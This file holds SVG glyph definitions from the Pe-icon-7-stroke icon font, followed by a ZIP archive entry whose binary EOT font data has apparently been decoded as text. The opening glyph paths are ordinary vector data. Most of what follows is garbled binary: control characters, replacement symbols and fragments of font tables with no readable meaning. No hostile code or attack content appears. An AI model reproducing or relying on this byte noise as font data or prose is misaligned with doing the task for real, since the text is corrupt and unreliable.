<glyph unicode="&#xe6c7;" d="M229.547 377.6h-58.88v-58.88h25.6v-40.96c0-9.387 0-15.36-9.387-24.746l-58.88-58.027v238.080l11.947-19.627 14.506 8.534-34.987 58.026-34.987-58.026 14.507-8.534 11.947 19.627v-308.053l-53.76 53.76c-9.386 9.387-14.507 17.067-14.507 23.040v40.106c14.507 3.413 25.6 17.066 25.6 33.28 0 18.773-15.36 34.133-34.133 34.133s-34.133-15.36-34.133-34.133c0-16.214 11.094-29.014 25.6-33.28v-40.106c0-14.507 10.24-26.454 19.627-34.986l66.56-66.56v-47.786c-19.626-4.267-34.133-21.334-34.133-41.813 0-23.894 18.773-42.666 42.666-42.666s42.666 18.774 42.666 42.666c0 20.48-14.506 37.546-34.133 41.813v117.76l70.826 70.827c14.506 14.506 14.506 26.454 14.506 36.694v40.96h16.214v58.88zM17.067 275.2c0 9.387 7.68 17.066 17.067 17.066s17.066-7.68 17.066-17.066c0-9.387-7.68-17.066-17.067-17.066s-17.067 7.68-17.067 17.066zM145.066 10.666c0-14.507-11.094-25.6-25.6-25.6s-25.6 11.094-25.6 25.6c0 14.507 11.094 25.6 25.6 25.6s25.6-11.094 25.6-25.6zM187.733 360.534h24.746v-24.746h-24.746v24.746z" horiz-adv-x="230" />
<glyph unicode="&#xe6c8;" d="M426.666 322.134l-15.36-15.36c-33.28 29.014-75.947 45.226-120.32 45.226-29.866 0-59.733-7.68-85.334-21.333l64.853 64.853c5.12-3.413 11.094-5.12 17.067-5.12 8.534 0 17.067 3.413 23.894 10.24 13.654 13.654 13.654 34.987 0 48.64-6.827 6.827-15.36 10.24-23.894 10.24s-17.067-3.413-23.894-10.24c-11.094-11.946-12.8-29.013-5.12-41.813l-81.92-81.92-15.36 15.36-41.814-41.814 15.36-15.36-83.626-83.627c-5.12 3.413-11.093 5.12-17.067 5.12-8.534 0-17.067-3.413-23.893-10.24-13.653-13.654-13.653-34.986 0-48.64 6.826-5.974 15.36-9.387 23.893-9.387s17.067 3.413 23.894 10.24c11.094 11.094 12.8 28.16 5.12 41.813l64.853 64.853c-34.133-65.707-26.453-147.626 23.893-205.654l-15.36-16.214 42.666-41.813 41.814 41.813-41.814 41.813-14.506-14.507c-49.493 58.026-52.053 141.654-10.24 203.094l6.827-6.827 42.667 41.814-7.68 6.827c27.306 19.626 60.587 29.866 94.72 29.866 40.106 0 77.654-14.506 108.374-40.106l-15.36-14.506 42.666-41.814 41.813 41.814-41.813 42.666zM197.12 32l-17.92-17.92-17.92 17.92 17.92 17.92 17.92-17.92zM275.627 436.48c3.413 3.413 7.68 5.12 11.947 5.12s8.534-1.707 11.947-5.12c6.827-6.827 6.827-17.067 0-23.894-3.413-3.413-7.68-5.12-11.947-5.12s-8.534 1.707-11.947 5.12c-6.827 5.974-6.827 17.067 0 23.894zM46.080 159.147c-3.413-3.413-7.68-5.12-11.947-5.12s-8.534 1.707-11.947 5.12c-3.413 2.56-5.12 6.827-5.12 11.947 0 4.267 1.706 8.534 5.12 11.947s7.68 5.12 11.947 5.12c4.267 0 8.534-1.707 11.947-5.12 6.827-6.827 6.827-17.92 0-23.894zM160.427 279.466l-17.92 17.92 17.92 17.92 17.92-17.92-17.92-17.92zM426.666 261.547l-17.92 17.92 17.92 17.92 17.92-17.92-17.92-17.92z" horiz-adv-x="469" />
<glyph unicode="&#xe6c9;" d="M253.44 453.546v0l-89.6-89.6c-54.614-54.613-56.32-141.654-5.974-198.827l-72.534-72.534-72.534 72.534-12.8-13.654 157.013-157.014 11.947 11.947-72.534 72.534 72.534 72.534c57.173-50.346 144.214-48.64 198.827 5.974l47.786 47.786h1.707v1.707l40.96 40.96-204.8 205.654zM355.84 169.387c-49.493-49.493-131.413-49.493-180.906 0-11.094 11.094-18.774 23.040-25.6 35.84h242.346l-35.84-35.84zM408.747 223.147h-265.387c-13.654 43.52-2.56 93.013 31.573 128l78.506 77.654 180.906-180.906-25.6-24.747z" horiz-adv-x="458" />
</font></defs></svg>PK!�*:68�8�<it_sanctum/fonts/pe-icon-7-stroke/fonts/Pe-icon-7-stroke.eotnu&1i�8�p��LP��s> Pe-icon-7-strokeRegularVersion 1.0 Pe-icon-7-stroke�0OS/2"��`cmapU� LgasphglyfƳ>�p��headE	��d6hhea��ݜ$hmtx}~�8loca��b��maxp��� namevͫ���post�P �LfGLf��@������  8
 ����� ���������7979793��,1Jc#54&'.#!"3!2654&#%!2!5467>3!!'3267>54&'.#"3#"&'.5467>32�8�������b��xx				D



W/��+E//��"�ޑ						+��'@35#7'#537'"3267>54&'.#"&'.5467>32#�F::FR"<<,N!!N,,N!!N,)GG))GG)V:�:v!4�!N,,N!!N,,N!�gG))GG))G+��)D_�35#7'#5377>7>54&'.'>7>54&'.''>7>54&'.'"&'.5467>327.'.#"3267>7'#�F::FR"<<�		

))Y)GG)&
"*,N!!N,*"
&V:�:v!4`
  

""
�

						



�G))G
!N,,N!
mS2Kd"#>7>54&'.#"3!267>54&'.#467>32#"&'.5"&'.5467>32#�*
�
*****��

$#

#$

|#

#$



$S*



*****s$

$$

$b
$$

$$
O�q"3:54&'.#!"3!267>=35##!"&=463!27#'573�n	��			p*,���usOBJ		�		KC����F1E�3��z�"3267>54&'.#2.'.'.5467>7>76&'0&14676&'.'.'#0#.'.5467>3>7>7>54&'.'4&'.'&476456&'&67>7>73#"&'.'*K  K**K  K*'D






D'�
	


		
%$
� K**K  K**K D'!



	!'D��			

U����%7'735#!#3!KWWB4o4o����WWB���"��E��U��#(%#5467>32354&'.#"#!5#!5!w�
##
((<V4#��4�f"



"""((f��������_�5#7467>323467>323267>5##"&=1467>323467>323>54&'.'".'.#".'.#".'.#">7>32.'.#	3Z"!'	


		
	'!"Z3�

	

	



(  T//T  (�)"#[3�		�
3[#")�
		

		

		
	.Q""Q.	^��$/>CGK#54&'.+"#3;267>535'46;2#51+"&51533#'�UVU
�
�
V
x�
�
�x!��

��

D

��

C��!������������uz��%'7''73267>7>76&/?'.'.#"'7'7.#"733267>7>76&'773267>7>54&'7'#*'?#&47>7>7>327'.7>7>7>32?#"&/#"&/7�[$<H	

''		
IfC$CfH	
('				H=$Z�e++y
	6
�
8	�
	Z$ZDZ$=H



&(


HfC$CfI		


('		
I=$Z	R++��
8		�

6		�eZ$Z	
+��T7013267>54&'0&#'&"7*##35#"&'.5467>7'3267>54&'.#�

hP'DG))G
	!N,,N!!N,�
	Og�	]U F')GG)'"*,N!!N,,N!����
&3#5''73'3267>54&'.#"3#"&54632�q���YH��bPw3



���rY���Od^



3��1Jc��"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32#74&'.#"73267>77'>7>5!467>32#"&'.5	



					

2222++++� K**K 

	#
#
  
#
"	

�wD''DD''D'		
		
		x	

	�2112�,,,,x*K  K*,#,
+		+
,",&EE&'DD'
���16;@EJOTY"3267>54&'.#"&'.5467>32#3#53#5'3#5!3#57'7'7'7'7..//((((�ff�ffGG��GGGG^GG`/../�((((ogg�fff��
GH��GGvHG
��GG��'35!57''7!57���#3"g����Ԁ���-xx����>eg��g���NN�<��(AT77'.'.'5#3267>54&'.'"&'.5467>32#75#35>54&'�*!&CG))G�%AA%%AA%	



T*"" E')GG)%��A%%AA%%A�pp

$$

��
'#7'7#'7/373666��6��6��'nn+c�**�n��f�hh�fltPP�G��O=�
2M3353#53#?'#5377>7>54&'.'>7>54&'.'3�}~�DD�bfgf�		
		
	


		7	wggeDhfUUYQ�SUe&'
 +* 
7



1��1Lg�%"3267>54&'.#"&'.5467>32#5">7>327.'.#5">7>327.'.#">7>327.'.#
		

		


(	
%%
	(#C2/?""?/2B$6'
$12$
'5�	
				
	x
		
�



�,*+
,D

&
#


#
%

*%��%#'#337'#37'737'#}8e�VO�l8MM��OVS
�e8MM8lS�7��8LMDWz7
ML8X3��	0!!!!%3267>=35#3#"&'.=35#33��f���x��((3
##
3��f��wx���));;"

";;��^w��".'.#"3267>73267>54&'.#"'>7>54&'73267>54&'.#2#"&'.5467>3'"&'.5467>32#%"&'.5467>32#�		�
		



	�

					��		



	U

�D�		
T

			]				
		\		T	
		��

D�

<��3Oj�"3267>54&'.#2#"&'.5467>3#"&'.=3267>75#"&'.=3267>75#"&'.=3267>7)GG))GG)(AA((AA(�A((A%77%A((A%77%A((A%77%�
#�#

##
��/D



//V/

/7��!:%'>7>54&'.#"3267>77%467>32#"&'.5�t	;!";;"


t�5445,t


";;"!;	t�5544G��c�����1Jl���%>7>'.'.#".'.#".'.#"3267>73267>73267>76&'.''2.'.'.'.'>7>3.'.'.'.'&454&5465<7>7>7>7>7.'.'>7>7.'.5'.'>77467>77>7>7.'.'<5<5'2.'.'>7>3>7>32.'.'&47"&'.'&67>7#"&'.'>7>7#7#"&'.'>7>7>7>7�			




				

^								

			P

E

W			>		U


�	
	
	(		
|


�	

� 
"
!
 
!
"
 t		�				



	
	BN	
<

�




^	�P




^		^��7!'!3#53#5^����3��"檪����fxx���kkg��D+
��
%!7'7'!5#%!7'!3���H\\Gx��hH\\G��qH\\G�VH\\G�3����)-%#"&'.5467>37'"3267>5#5�D''DD&��*J  K**K �oo�&EE&'DU^]U J+*K  K*@A�>�1m�%4654&'.#".#"3!267>54&'.##!"&'.5467>?>7>327>7>320132#'"&'.5467>37'"3267>5##�0%
			

%="

"��	
		
*

�

@@



�0

	
%
#"

�

			)


<	
	%%



	+��'8ER_ly����������"/HUn{0&1%&!"3!267>54&'.##!"&5463!2%"32654&#4&#"32657"32654&#"32654&#4&#"3265'"32654&#2654&#"3"32654&#3"32654&#'"32654&#2654&#"3"32654&#3"32654&#'2654&#"37"32654&#"32654&#"32654&#5"32654&#5"32654&#"3267>54&'.#"&54632#"3267>54&'.#"&54632#���#��		z	��z�^��kk^�����onn7�								NUD	��		�����@3go��3�3
		
"#



""��27<E"32654&#3"32654&#%#5##";35326=4&#%3#5#537#5##5!x



3



*^�^^�^�������gV�V�







DUU�DD�DDD�x��Dff��X�h%'7%'7��޼��3��޻���kkk�k��kkk�3��73#5#"&'.5467>753267>54&'.'�^'
D''D

%+ K**K -���""3&EE&2"&8*K  K* 9&3)��
%5##!#'3#53#5##53#5353353!<x���gVV��x��gVV�x���m**��D*�""�x33��""�+��1="3267>54&'.#"&'.5467>32###33535#,N!!N,,N!!N,)GG))GG)	vvww�!N,,N!!N,,N!�gG))GG))GDwvvf-��
'-x�4��u��*��������'I/?>?'77>7>323''?06?7'7>'&"#"'�e]T�-�O		
O'-VN'aZ_V'VU��e[d(UV,'O			P�,�OW�YU`��VU'We$��5!3!#!!#!!��o;�;��o��*���oWE��E3�4�E��x����',7<#";267>54&'.#+"&=35#3#546;23#5q�		�		�������44��b��KOO`��"������=jot''&"326?.#"01"1023267>7>76&'7'>7>753461425263>7>32'7'7�D����

 A��
	'&	Ve,e,�,�,��D����P		B��
'%	ee,e,E,�,�+��77'%'7�L�V�wF�G;і����E4�уw��/����KPm54&'.#!"#"372#35#54&'.+1#"&=46;3!267>=35##53#!"&'.=467>3!2�	��

�
"U"�	�33�	��			�		
;
;��;

;		�w��]		F		F3��-=#"3!#'53#3753!"5467>3"&'.5467>3!!�		
T�*.Xw?;���	D���
		��	
��'(��56�����

M<��..#"5!!#7>54&'!337#57>32�
	K��DLM���#�A���K��L
	��"�%��X�
�X�h7'577'5���������h��kk���kk�+��):?DINS#03:3:3267>541!"&=3+%#!>7>5!3#53#53#57#35#53�f
			U45c
��/U	b
��"��������������r

i�gzs
	"

	b��D�<怀o^^+��	-6O3#53#53#5%4&'.'*#"326764=7'5#"&5467>;1+������3w1ee#
�%5WLM� (

��		
#�
A		��


3����;Tm.'.#"3267>517.'.#"3267>5<51"&'.5467>32#%"&'.5467>32#��	

	
	�
	



	
��				�d�


	


X�



		
'�?		^				�����1;EU5467>7>=#3267>=4&'.'#5#467>7#5"&'.=3#	


+//+ff%�%fo(�(W	**	,..,|w&&w�'bb'�1Jc|�"3267>54&'.#"&'.5467>32#%"3267>54&'.#"&'.5467>32#'"3267>54&'.#"&'.5467>32#3



�



�UUUUU+��$J3267>7#"&'.5467>773267>7#"&'.5467>71� J*
%3)I
%/#<"O-&E'$'C�
*I 	&

 H*2%
&	(D%-O"=$
D&"
"��%!3#35#53!!�D�;�;�U��fq3��DD"��o����5]%267>=4&'.#"3467>32#"&'.=#"&'.=###35#5#>7>=##

#"



"M






�//2M�L2z
"�"



"�"




�

�UU..UU4UU4U3O�q	!5!!5!!5!7!!5!5!7!!53��f���x�w��fx����fx��qDD3""�DD3""�DD3""+��
!'1'77'7'77'q^fooffod�UUfUUgUUfUU�/38��8448f3��*@+��**A+��**@+��**A+��U����3Oi2'.'.5467>3267>54&'.#"35">7>54&'.#1"&'.5467>32#1 8��8 



#>	��	>#				�8 
	
��
	
 8�	
				
	�>$
	�	
$>�				+X�h !!#"/!57326?!%'7�g���f��oo
n//n��{ooh����oo��m//m
oo�+����#,1'.#"!'%762'.#"'71571762!%'7Ժ���r��{-.{	fopc
����{qq������{..z	�n�p{	����pq+����).5>CHMR'.#"#!'5'62#7'.#"'537'751571762!%'7%3#53#553#5Ժ)=U�BB�TJ3(-.'��:C	
po
����{qq�xxxxVV�(>U��B�B�-4�(..'�:�B	-pn��	����pqmf3D��#(G#"&'.=#3267>=##53!#53"&'.=33267>=3#VfD''DfUDD��DDg#>D
&&
D>#����&EE&�3333�x>#��%%��#>qO@w7"&'.5467>321#35#'#.'.#"3267>7'#%">7>32#"&'.'1'33267>54&'.#G���#

#		"<!	
((
	
"		
	#

#	98

((3���
##
	!<!((
�	
##

88((Fz1Jc|�"3267>7.'.#"&'.'>7>32#5"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32##@>"7E++J  56  J*&>299%B22B&%%%%







				z9$857��1!210�%%%%�



�



g				U��#(%54&'.#"#!5#'467>32#5!5!o((<V<�
##
����4�f((f��f"



"ff�������w�7F375#3#'553##'3"3267>=4&'.##"&=4632�;x;���;VVXV/�--



	�3g��fg3�"""^��'QM^	"		"	<""+��2m%"&'.'7326?>54&/.#"'7>32#"&'./.546?>32'.#"3267>?#

	k
		
		LLk�k

	k
		


HH�		

	l		
		
KKl	�	k	

	l		GG	+!��&N2'.'.5467>32>7>35".'.#"7>7>54&'.#1^%��%+��	
+�%
	��		
%				+
��
+U����/4A�4&'.#"1202135467>71>7>553#"&54632#8##5>7>54&'.#"#54&'.'041"4#04#.'.5467>32�>##>
		�		
�ff3



\*		*	8  8	-#>>#'
	xx
	
'��33"



j
"��"

# 88 #+��16"3267>54&'.#"&'.5467>32#'3#5,N!!N,,N!!N,)GG))GG)n���!N,,N!!N,,N!�gG))GG))G�<��1Jc|�����+D]v���7"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#267>54&'.#"352#"&'.5467>3"3267>54&'.#"&'.5467>32#o���UwU;	

	V

<UwU;	

	V

<UU	

	V

+O�q.9H%''77'7!3;267>?>7>5735+"&/!7#!"&='!?3334
33
4�V�S�	>1
��
p�3333333�"
��
"�
���

  +��#<U267>54&'.#"35#3#35#"3267>54&'.#"&'.5467>32#



3E,N!!N,,N!!N,)GG))GG).



#�;!N,,N!!N,,N!�gG))GG))G*��
#5#77'3535335'#5##57UE<��ֈ""xDx��"UfU���U"f<���D""D��ww̚��ww����
3��2M\x�����"3267>54&'.#"&'.5467>312#?'>7>54&'.'7.'.'7'.'.#1"'>7>32'>7>7.'.5467>77.'.'7381267>7#"&'.'7'>7>7*K  K**K  K*#

##

#fA@8@
+	
I+



+



�+
@
	CA@@	*	
I,+



�*	@
	� K**K  K**K ��
##

##
�+


+

:+
@
B@@@
+
I+

+


�+
?
	CAA	?
+	
+��1dq"3267>54&'.#"&'.5467>32#"3467>323467>7>7>54&'.#"32654&#,N!!N,,N!!N,)GG))GG)							





�!N,,N!!N,,N!�gG))GG))G4
				

		
�



+��%#####5##5#1!5�UUUU���w���ff���3��
!!''!5777!3��f�qMU32x��54UMm����f�J�=x":?��="v=�������r����""&#"'>54&'.#".#"3267>54&'.'732673267>54&'.'7:3267>54&'.#"&'.5467>32#7"&'.5467>32#"&'.5467>32#"&'.5467>32#�	P
Q		V			V
P		P		��



�



�



o



�	�C
	�			�C			
�		�3
		
�				w	

	"	

	+��(1FU%4&'.'1#13267>7178175>7>5'5"&'.5467>7#7'7� K**K !N,
 "�4"�)GD'p

uh�
�+L""L+,N!&2OC�*��G)'F Ǥ'�C-#
+��*9GUdx�������':81818#"32018181267>54&'.#267>7#5=#'"&'.'>7>7#467>73#>7>7.'.'3;".'.5.'.'>7>352=3.'.#73.'.'>7>554&'.'>7>7#7.'.''.'.'>7>7>7>7.'.'>7>7,M!!M,,N!!N,	LM	^]		]M	ML]^		^&


�	

^

	
�


�!N,,N!!N,,N!	M\
\\
mM	M

M	^\
\\
mM	M

�
	
6	


��
	

6	


f����
37#773#7,a�a��q�q��ճ�<���"�uKMf%#.'.#"'&".'.#"#";3267>5<573267>732654&#"&'.5467>32#!"&'.5467>32#�$"

"$$''$�� 

 !!!! 

 �"





""
'

'
"g        3��)26Ohqv{>7>54&'.#".'.#"#!##537'3'#772#"&'.5467>3467>32#"&'.573#533#553#i			



			d�dS�
*%��

<

�

H%*
�����ų�F
	

	
��D��H@"V

3

E@H��������31��$4?#54&'.+"3!267>=4&'.#%46;232!5!"&=!#��VV��
V
�
��g��
x
d	���
	


<��
��
f$��+[0#"&'.'.'.#"35>32326?5#"&'.'.'.#"5>323267>7�+$
					
%						
&.		
					

						
	
�
������"��
%#5'!'357!3f���UD���������˛k��
'#!1'#533!���*�qq�w�����f	yqq��x��3��#5#357'737355#35#7'#35#��zz�czz��z�cz�zzc���czzzzc���zc�znzz�3��	735#73#5%35#37%35!#33����3�l~}��x�������3�~~bͼ���<��4Pi��4&'.#"3>7>5"&'.5467>32##3267>54&'.'"&'.5467>32#75#35>7>54&'.'"&'.5467>32#�	

*				��
	
					�	



�		��#



�#��		D



恁��D



^����"C%4&5'113267>54&'.'"&'.5467>7041701#��x;"";�5}}5��"�	

!;;!

	�4
		��		
4+O�q*#!5'3##"&'.5#7!533267>73x�^�]��M�

�N4�xy





yqf��fU		U��
		
�U=��7'#73!35#!�WWB4o��o�VWWB����"��E	 ��$).38!33#!5#5335!!'#35#53;#553#53#5!!5!!5�4"��"��"3��f�ffDD4wwwwww������++3��"���ggVEEV+^3"��
7P%!377'53!!''777'"3267>54&'.#"&'.5467>32#�D�PQQP�U��f�3"5'0$7/]



u3��!----!"���GBk�dbGL�$	

	V

3��
#!!'#53!33533#53#53#5w���V"��g��V�
L�w������fDVxx��x��L��V44�33��	'\!!!5!!!3#5;#5#335#"735#37>32#"&'.=#3267>54&'.#3��f���x��x��o�m!d8F




��f�MM����^�_�(H



��2@P]0"+1!*1"5#35#5>7>57>54&'.#'.546320313#"&'.=!7532032�1��
K2D�D2K
��?	2//P?2	�
K3��3K
m?
\//ooR?\
��#(3'3#!5#%7!3#33#33#33#33#�D��>"�"������33D33D33D44E33���nn�������+��%7'!5##3!3535#!!���33"DD�����X
33��44������F�z!,7<AR!"3!267>54&'.#!!5#!"&=!%5463!2!3#553#5326=4&+"3�f		�		�^��V��f��V��V"��ff3"

"

z
�


E""�����3D	

	B��	
"'##!53'#533##55'#533#�W�hhW>>��V�>>VVE�VVjVE��E%>>>�iYV��R>>���V4V��+��Xq��73#'#5'.'./'7'.'./#537>7>?'77>7>?53267>54&'.#"3#'#3735>7>77'>7>735#.'.'7'.'.'51"&'.5467>32#1

$,-!$!	
4
	!$!-,$

4



+V!<!/1#<$
V
$<#1/!<!+



�)$	

4
	!$!//!$!	
4

	$)��



"- <!
V$<$33$<$V
!< -��



3����*C\aei>54&'.#"3267>54&'.''2#"&'.5467>3"&'.5467>32#'?77'7 		%? K**K ?% 



'DD''DD'f�B�AJ+R'8,R&�		$E&+J  J+&E$6
		
�DD''DD''DUB�A�w,'S ,&R3-��3@MZ!";53267>=4&'.#+'#"&=463!2'"32654&#3"32654&##"32654&#����C#
4+�

V
�



D



�



��
DD
��
,,
�

ހ











<����%).38%35!3267>753#5"&'.=!#!5!3#5;#5'3#5�D�x;" :33�5"5�D��U�E���";8 xgg�5oo5"�MMMMff>�;n20132+!"&'.5467>?>7>327>7>35".#"3!267>54&'.#4654&'.#1*

��	
		
%
			

%="

"0q)




			

	
%
#"

03��17"3267>54&'.#"&'.5467>32#5#35#*K  K**K  K*'DD''DD'fw� K**K  K**K �wD''DD''D��+��1H"3267>54&'.#"&'.5467>32#'&"326?64'&",N!!N,,N!!N,)GG))GG)k�09��!N,,N!!N,,N!�gG))GG))G�09�+��5!333535#5!###'#5!U�ր�D*����o�*7�5��DD�U�oU�77����6Ohm!'#33267>54&'33267>54&'.#1#'37#"&'.5467>323#"&'.5467>32/!#�PCS		x			��E��
		
�				�)J:�Fx��
		

			"��

		

		^��+>��+Haz��#'0"9.+"1#"3!267>=4&'.##!"&=46;77>;232'"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32#�F)
U
(H

f


��

OU.N
�((((#

##

#







O)(���

�
.
��((((�
##

##
�



�



3����L�"&'.'.'.5467>?>32367>13>321#"3267>76&'.'.#"'"&'.'.'.7>7>?64'.'.#w0?*
		 
	
7
�	

(=+			4!	;(&@.	C

	)"%

�	+>%'9		
#
$)
Bf��	&7>ELSZaho35#73#57#";267>54&'.#+"&546;2'5#35#5#35#5#35#75#35#35#35#5#35#5#35#35#35#�������

�


�

�
�D"D"D3D3DwD"D3D>DD3""<��V��

V

���3DU3DV4E�3D3DU3DV4E��+��	!!!5!!!!!5#3#5;#5+��V��x��x��x^��E#��V�DD�x3��o����'7'''77��������	��������QT��SS;��JJ��+HHHH�JJ��3 ��
/@!3!35!!!5!3267>=4&'.+"3'46;2+"&=�fx"��V��x�||	|		|	�o��o���MM�%+��5FW#".+";201235154630213267>54&'.#46;2+"&5!+"&546;2��

�

�		�

��
�

�
�
�

�
�
��

	

"
��"

��



"

��SmKU^|��"'35##'35#01.'.#"3267>7326?3267>54&'.#'#.'.'7#7"&'.5467>32;#7'3"&'.5467>77'>32#�	* <�9$	#

#!
FN

##

#�>3@L

&O

�>�G�

$$


S"&?
#"


�4

"



"#
&{	6{6V

C		[{{[

	HG

3��0>%54&'.'54&+"!5'!575467>32267>5#3�,

,<�<+��</.<�	V	��0

0�00;1�..�1M		qOCQ;5#"#"&=46;%4&'.#54&'.+32+3267>=267>552#	��	���"
	����	
36�	�	���^#	�	#"D+��&@N\v�"3267>54&'.##>7>7'2#4&'.'>7>3#>7>73.'.'"&'.'>7>53#7.'.53,N!!N,,N!!N,ę#
�

	
4
	

`�
#d�#
�

	
4
	

`�

#�!N,,N!!N,,N!�+'#0�),,)'+0#�*'"0�),,)'*0"+>��#3.'.+'77524&'.'5�,E43����;4
YOaF;(Epp!��U0+P%&6V��!!3#5"32654&#����n�		��p�"��]�ww� ����>W%'7>7>54&'.#".'.'7'73267>77467>32#"&'.5�"L2	3
				

	3	.L"
$;! :$
��

XF+3		
	



	
		��*F220-*��	!!!!!!57!!5�4��V��g��x"D��h��U��3��g"+��*COZfrx"73267>77'>7>54&'.#"&'.5467>32##"3755467>;17#354&'.#1'132#35#'D,
+
$$
*,
D'#??##>>#M3
pf		"�3p
Df"		�^p�E'"
5446"'E��>#$>>$#>�
3pf"		p3
wf		"x�3-��!3!'37#%#'#5!�f�X4X���tt�0�33�x��ff����f<<����aA77'7'�
UTTTTU
TA
TTTTTT
U+��1=3267>54&'.#"#"&'.5467>32'77'7'iO))OO))O"H&&HH&&H�
UTTTTU
TwO))OO))O��H&&HH&&H�
TTTTTT
U��`'77'`TT0`
UT0*��19%267>54&'.#"32#"&'.5467>3'77',N""N,-M""M-(HH()GG)aUT0!N,,N""N,,N!�G)(HH()G�`
UT0��?@%7'73aTT1�`TT0*��1973267>54&'.#"!#"&'.5467>327'7*"M-,N""N,-M"�H()GG)(H�aTT1�,N!!N,,N""N,(HH()GG)aUT0��-@77'7'�`TT0�`TT0*��19%4&'.#"3267>5!467>32#"&'.577'7'�"N,-M""M-,N"�fG)(HH()G�`TT0�,N""N,,N!!N,)GG)(HH(`TT0��`77''�`TT0�aUT0*��19"3267>54&'.#"&'.5467>32#'7''-M""M-,N""N,)GG)(HH(
aUT1�"N,,N!!N,,N"�fH()GG)(H�aUT06�	y7'7'#57<54&'.#".#";5#"&'.5467>?>7>327>7>320132+3267>54&'.#�ML88�1$		
	
%oo

	
	
*

xx"

#�
LL7��7i1


%


			*


##
���	y%'75377<54&'.#".#";5#"&'.5467>?>7>327>7>320132+3267>54&'.#ALM88b0$
				

&oo

		
*



xx"



"JLL8��8�1


%


			*





"#

A�16<DLQV[`"3267>54&'.#"&'.5467>32#'!5!!5!!5#!5#!5#!5#3#53#5%3#53#5






���m���qI���J�����2222
22224

T

���8��(��"�������5'7'7577'57'wflqk�yu�^^bb�flqk�yu��^^��bb��a�"',37'#5##3#33535#5'5!!!'7!%3#53#5�u33u��v22v���$$����$$��TT�TT+<:""v;;��vT)+2T**u�	��	!&+�3#53#553#5'5##!##53'3#53#5!!7.'.'"&5467>5>76&'4"14676&'.'#0"#3581025>7>7>54&'.'5'0&'<14656&'467>73101213<54&'
uuuuSSC�������""�����m�	




e2�33��q""2TT2""����K
				
			
��%/:S#7'7'.#"723267>5<57'.'.'7/77"&'.5467>32#�50�wY4>^D4_w_KG�K0

6Y....3`50kwZ4>`E4`__L
G�sM15B.--.��q�1|73267>54&'.#"72#"&'.5467>37'#"&'.5467>77'"3>7>323.'.#5267>72:!!::!!:�4444_
(F
'* J)
#	




	#

�!::!!;;!�4444��.F(3$.
(8*K#��5Pk#935151511'#53717>7>54&'.'7>7>54&'.'7>7>54&'.'�{_`zdTTd8D



4					
	
	
	
�bLKaa�b�NNvP?v�	

	





= $$ "&(#7-32,.56/0���w73:3:130233:3:13023:3265<54&'.'.'"&5467>7>76&'<1&676&'.'.+"0.'.'&45467>7>76&'041&676&'.'.+"01#467>7>7>54&'./.'&6715061516&'&67>7>731!5'467>7>7>54&'.5/.'&4=3<1536&'467>7>739#5H
Z		
Z	


	
	
				

�
		
	

��

	


u�
			
		
		
						
			



	
	**
	
		��i�"3267>54&'.#>7>7>7>='"&#"&'>7>737>7>321#"#"&'.'7.5<1063267>7.'.51.'.#"#3210.'.5467>32�)J  J)*I  I*n
			
			
		�9		

9C&'C
�I**II**I��!



				





	

 !! 
	&&CC&&��1:%4&'.#"3267>5!467>32#"&'.5%7'735�!M+,L!!L,+M!�mF((FF((FffQ�+M!!M++M!!M+(FF((FF(
ffR��I�w1Z%4&'.#"3267>5"&'.5467>32##32+3267>54&'.#.7777�1111ɀe11e� 77 �7777�11111177G�w\g������7'.'>7>'.'.3267#.'.'.7>7>73#3534&15#.'.5#35#'7'>%.'&67>76&'&'.'&67>763#5;#5!3#5!3#5��j-



(D

N262E��3$��




33�22��33P22�OKB	

:
	

	



PgD



f

]��7<AFLQW"#33267>54&'.#"&'.'35#>7>32#5#3=#37!!#531!!!!1�









::


���
������\��~�,				

�

3C�2Cv����?�~���`����1:7267>54&'.#"32#"&'.5467>37'#3�+M!!M+,L!!L,(FF((FF(
ffQ��!M++M!!M++M!�F((FF((F��ffR��JZd%1"1#"&'.5&6777>?7'7''7''326?>327.#"'7#"&'.5467'7-�
 !

/0HG0GG/0''�!"
�0v/

��



 
0/GG0GH0/&&�

�/v0v
��.Y3:377'7'..'.'645./?117>76.7>?'1.'./#"#"&'&	z��z#",�`Y3�	

,";	,"#z��z	&�aM*�3(���>7>312#"&'./1'.'.5467>7>7>32'.#"3267>7>54&/.'.#"'.'.5467>7"
		
�
cv	��

�	
				�			���

�dv��
	�		�	
		��



����	 >S73#53#53#5.'.#"#!#5467>32#>7>?!33.'.'53e���Ɇ��	
		���S
�	���
�	
��CC.		�L�&���
		
�n��"'%5#535#3##35#53#35#'3#5#533#53GuK�LuL�L�L�L�����놆�*��*����ۇ���������''5#9373717717537#31'515�r{`?kvc~��Ud{>�Vs�r]bLKkvd�uP?zNCZ`l��.�'AZs�>7>=#3267>54&'.''53353.'.#".5"&'.5467>32#5"3267>54&'.#"&'.5467>32#�
�
77 �ST



\1111$$%

%




" AA #		)77)	w0ss0D%J�|1111�
%$$%
�



��S�%4&'.+>7>54&'.#"#*132;267>54&'>7>54&'>7>54&'>7>5#32+32+32+1#"&'.'.+5:3:3267>7>7>54632134132#�
	�			9[


�


&o
	J	


g<
�
N
�
			�&!*E��1:"3267>54&'.#"&'.5467>32#'7'35#�,L!!L,+M!!M+(FF((FF(
ffR���!M++M!!M++M!�mF((FF((FffR����%I3#54&'.#"357'57'>7>5#5'.'.5467>32m~++

T*)

Q$$2		
%%
		CC2++"�;!**"^##/1�%

%��h�����"5467>;267>7#+"189.'.#"381267>7>7>3:3:1:323812654&'.#9"&'.'.'.+"#9"&5467>323267>7>7>32#%##33535#7"3267>54&'.#"&54632#7"3267>54&'.#"&54632#\


#
%


)/
		
/)
F					2					#
		

		
#��""""�				C					


&
#	L23

32L�%0FF0%�!""				"				"0��	#(-26:!!#535#535#535#53#3#535#535#535#537'5��\C22222222
��C33333333�uuCC���`��CCSDDTDDTCC�>_�CCSDDTDDTCC�DD''N��1f�	l�7267>54&'.#"352#"&'.5467>3>54&'.#181"813267>7465'0010101'>54&'.#818101*#81'>7>71>7>783>3:1263:3263:3201201"1"#0#'>70"1"#"*#"*1"#0#**1*#"&'.'<5<5<7<1467>781>7>781813267*1'#"&'.5467>32�				

�!M+7&!L,'F%d

	T
		$A"-	8dT'D 
S
8	
		
�				C				3
+M!(	

+M!A%<	
S
